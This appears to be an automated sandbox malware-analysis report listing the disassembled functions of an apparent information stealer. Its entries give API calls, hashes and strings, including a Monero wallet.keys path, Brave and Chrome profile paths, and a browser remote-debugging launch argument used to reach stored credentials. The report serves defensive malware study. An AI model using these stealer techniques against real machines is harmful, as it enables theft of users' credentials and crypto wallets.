Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: d38760929d17c6b70def5727af49b99ded711719dd670ddf734369220a201d39
Instruction ID: b5c441181800a468162fdbc968e77f6a83acb5214f22edde38d1078361d5e09f
Opcode Fuzzy Hash: d38760929d17c6b70def5727af49b99ded711719dd670ddf734369220a201d39
Instruction Fuzzy Hash: 33F05E30A44229EFEB10BBA0FD0ABBE33B4AF04B05F141619B512B9184CBB55900CB91

Function 00E14800 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63
stringnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E14889
InternetCrackUrlA.WININET(00000000,00000000), ref: 00E14899

Strings

<, xrefs: 00E14819

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlen
String ID: <
API String ID: 1274457161-4251816714
Opcode ID: e8bb9d8159c8037bd467f43619cc456ff6f26ba3553492045ca63bede80fb169
Instruction ID: c0cccb708f64c053233e1e7cbcc79b6f354784ae926417a7bf6a2076c72aae30
Opcode Fuzzy Hash: e8bb9d8159c8037bd467f43619cc456ff6f26ba3553492045ca63bede80fb169
Instruction Fuzzy Hash: 67214DB1D00209ABDF14DFA4E845ADE7BB5FB45320F108625F925BB2C0EB706A09CF91

Function 00E25440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E2AAF6

Part of subcall function 00E162D0: InternetOpenA.WININET(00E30DFF,00000001,00000000,00000000,00000000), ref: 00E16331
Part of subcall function 00E162D0: StrCmpCA.SHLWAPI(?,0099FB60), ref: 00E16353
Part of subcall function 00E162D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E16385
Part of subcall function 00E162D0: HttpOpenRequestA.WININET(00000000,GET,?,0099F2D8,00000000,00000000,00400100,00000000), ref: 00E163D5
Part of subcall function 00E162D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00E1640F
Part of subcall function 00E162D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E16421

StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E25478

Strings

ERROR, xrefs: 00E2546A
ERROR, xrefs: 00E254C3

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
String ID: ERROR$ERROR
API String ID: 3287882509-2579291623
Opcode ID: f34ee74ca7a300730f9c4a958de5a265500f3ad74c3084e94d5a0e8ae5c3bd66
Instruction ID: 4f739a58af83c770ace580f96884ff4445422dc11117de31850d268a7e344107
Opcode Fuzzy Hash: f34ee74ca7a300730f9c4a958de5a265500f3ad74c3084e94d5a0e8ae5c3bd66
Instruction Fuzzy Hash: 4B1116719001189BCB14FF64ED52AED77B9AF50340F445568F91B77492EF30AB44CB51

Function 00E27A70 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E27AA0
RtlAllocateHeap.NTDLL(00000000), ref: 00E27AA7
GetComputerNameA.KERNEL32(?,00000104), ref: 00E27ABF

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateComputerNameProcess
String ID:
API String ID: 1664310425-0
Opcode ID: 1a48543ed5c10a63bf5083c8ad0219b3f978d1384b598f3bc94ec81e9d403821
Instruction ID: cedbbfc3e4ee894899455e12eacb3473f566f6eddb207724ab6dc16792ccb439
Opcode Fuzzy Hash: 1a48543ed5c10a63bf5083c8ad0219b3f978d1384b598f3bc94ec81e9d403821
Instruction Fuzzy Hash: F50186B1908359ABC710CF99ED45BAFBBB8F704B21F100219F545F6280D7755A00C7E1

Function 00E11110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00E1112B
VirtualAllocExNuma.KERNEL32(00000000), ref: 00E11132
ExitProcess.KERNEL32 ref: 00E11143

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: 21b883d0efe9db106f37bc8e3267264337461a931a0ab32ee431065daf40e677
Instruction ID: 116e265f96f8714629de8094f28fc7862949de5ee2427e4157431bbd3fe248d5
Opcode Fuzzy Hash: 21b883d0efe9db106f37bc8e3267264337461a931a0ab32ee431065daf40e677
Instruction Fuzzy Hash: 45E08670E45308FBE7209B919C0AB4C76A89B04F05F100084F7087A1C0C6B925404798

Function 00E110A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00E110B3
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00E110F7

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 321e4e1eb9980f460e5835835aaedff52793286c7e80e1c30cb73116095fb43e
Instruction ID: c457123be73b54ccc5edec415f0e03fb31d9595c0014de670908a49bb04f0d9d
Opcode Fuzzy Hash: 321e4e1eb9980f460e5835835aaedff52793286c7e80e1c30cb73116095fb43e
Instruction Fuzzy Hash: 29F0E971641314BBE71496A4AC59FAFB7D8E705B04F301488F540E7280D5729E0087A0

Function 00E11190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00E27A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E27AA0
Part of subcall function 00E27A70: RtlAllocateHeap.NTDLL(00000000), ref: 00E27AA7
Part of subcall function 00E27A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00E27ABF

Part of subcall function 00E279E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00E111B7), ref: 00E27A10
Part of subcall function 00E279E0: RtlAllocateHeap.NTDLL(00000000), ref: 00E27A17
Part of subcall function 00E279E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00E27A2F

ExitProcess.KERNEL32 ref: 00E111C6

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateName$ComputerExitUser
String ID:
API String ID: 3550813701-0
Opcode ID: 891fe4e3c72f09d6925307b468a1e73a46b6a5b683f82db4b4bf5b0373e820c2
Instruction ID: 1d2ad1ef3a25cf2900471a03f2e233a19e025410070402b179e92e25150bff31
Opcode Fuzzy Hash: 891fe4e3c72f09d6925307b468a1e73a46b6a5b683f82db4b4bf5b0373e820c2
Instruction Fuzzy Hash: CEE012B9A0532167CA2073B57D07B5B32CC5B1474EF402458FA44A6106FD2AE8404365

Non-executed Functions

Function 00E1BE40 Relevance: 58.5, APIs: 26, Strings: 7, Instructions: 730fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98

Part of subcall function 00E2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E2AC82
Part of subcall function 00E2AC30: lstrcat.KERNEL32(00000000), ref: 00E2AC92

Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,00998918,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22

Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15

FindFirstFileA.KERNEL32(00000000,?,00E30B32,00E30B2F,00000000,?,?,?,00E31450,00E30B2E), ref: 00E1BEC5
StrCmpCA.SHLWAPI(?,00E31454), ref: 00E1BF33
StrCmpCA.SHLWAPI(?,00E31458), ref: 00E1BF49
FindNextFileA.KERNEL32(000000FF,?), ref: 00E1C8A9
FindClose.KERNEL32(000000FF), ref: 00E1C8BB

Strings

--remote-debugging-port=9229 --profile-directory=", xrefs: 00E1C495
Brave, xrefs: 00E1C0E8
--remote-debugging-port=9229 --profile-directory=", xrefs: 00E1C534
Preferences, xrefs: 00E1C104
--remote-debugging-port=9229 --profile-directory=", xrefs: 00E1C3B2
\Brave\Preferences, xrefs: 00E1C1C1
Google Chrome, xrefs: 00E1C6F8

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-1869280968
Opcode ID: 003f0df08df022bc18fa9926f84826a0483c30cad734a2c7a84274af7a0f6435
Instruction ID: e6aa66defb043cf4428a69b3b58311d3c17c33221c06c7a4ee101d8a23401b4d
Opcode Fuzzy Hash: 003f0df08df022bc18fa9926f84826a0483c30cad734a2c7a84274af7a0f6435
Instruction Fuzzy Hash: 705257729101189BCB14FB70ED96EEE73BDAF54304F4455A8B50AB6081EF345B88CFA2

Function 00E23B00 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00E23B1C
FindFirstFileA.KERNEL32(?,?), ref: 00E23B33
lstrcat.KERNEL32(?,?), ref: 00E23B85
StrCmpCA.SHLWAPI(?,00E30F58), ref: 00E23B97
StrCmpCA.SHLWAPI(?,00E30F5C), ref: 00E23BAD
FindNextFileA.KERNEL32(000000FF,?), ref: 00E23EB7
FindClose.KERNEL32(000000FF), ref: 00E23ECC

Strings

%s\%s, xrefs: 00E23BCA
%s\%s, xrefs: 00E23CBF
%s\*, xrefs: 00E23B10
%s%s, xrefs: 00E23CFD
%s\%s\%s, xrefs: 00E23C9A

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextlstrcatwsprintf
String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
API String ID: 1125553467-2524465048
Opcode ID: 5fe93c820b04da049bc8b1f360577e82ffe6b8d2ec1640b3a9b922b7f211c3a8
Instruction ID: 4538ea6ee1afc6faaf1c0a5776bfee90fac79b61e9e9ec97bde7f49f5345a7e7
Opcode Fuzzy Hash: 5fe93c820b04da049bc8b1f360577e82ffe6b8d2ec1640b3a9b922b7f211c3a8
Instruction Fuzzy Hash: 1AA141B1A003189BDB34DF64DC85FEA73B9BB48700F044588F64DAA185DB759B88CFA1

Function 00E24B60 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00E24B7C
FindFirstFileA.KERNEL32(?,?), ref: 00E24B93
StrCmpCA.SHLWAPI(?,00E30FC4), ref: 00E24BC1
StrCmpCA.SHLWAPI(?,00E30FC8), ref: 00E24BD7
FindNextFileA.KERNEL32(000000FF,?), ref: 00E24DCD
FindClose.KERNEL32(000000FF), ref: 00E24DE2

Strings

%s\%s, xrefs: 00E24BF4
%s\%s, xrefs: 00E24C4B
%s\*, xrefs: 00E24B70

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*
API String ID: 180737720-445461498
Opcode ID: 18ecb343e7c0127d3f7032730b5d34233b400caa5a2d4cf5d9c8973c3858c384
Instruction ID: c24998078cb5f006cda52a82324474c056f1d01381671c43e785337ba3b2a5a8
Opcode Fuzzy Hash: 18ecb343e7c0127d3f7032730b5d34233b400caa5a2d4cf5d9c8973c3858c384
Instruction Fuzzy Hash: 39615BB19002189BCB34EBA4EC59FEA77BCAB48700F0045DCF649A6185EB75DB84CF91

Function 00E247C0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00E247D0
RtlAllocateHeap.NTDLL(00000000), ref: 00E247D7
wsprintfA.USER32 ref: 00E247F6
FindFirstFileA.KERNEL32(?,?), ref: 00E2480D
StrCmpCA.SHLWAPI(?,00E30FAC), ref: 00E2483B
StrCmpCA.SHLWAPI(?,00E30FB0), ref: 00E24851
FindNextFileA.KERNEL32(000000FF,?), ref: 00E248DB
FindClose.KERNEL32(000000FF), ref: 00E248F0
lstrcat.KERNEL32(?,0099FA50), ref: 00E24915
lstrcat.KERNEL32(?,0099E528), ref: 00E24928
lstrlen.KERNEL32(?), ref: 00E24935
lstrlen.KERNEL32(?), ref: 00E24946

Strings

%s\*, xrefs: 00E247EA
%s\%s, xrefs: 00E2486B

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

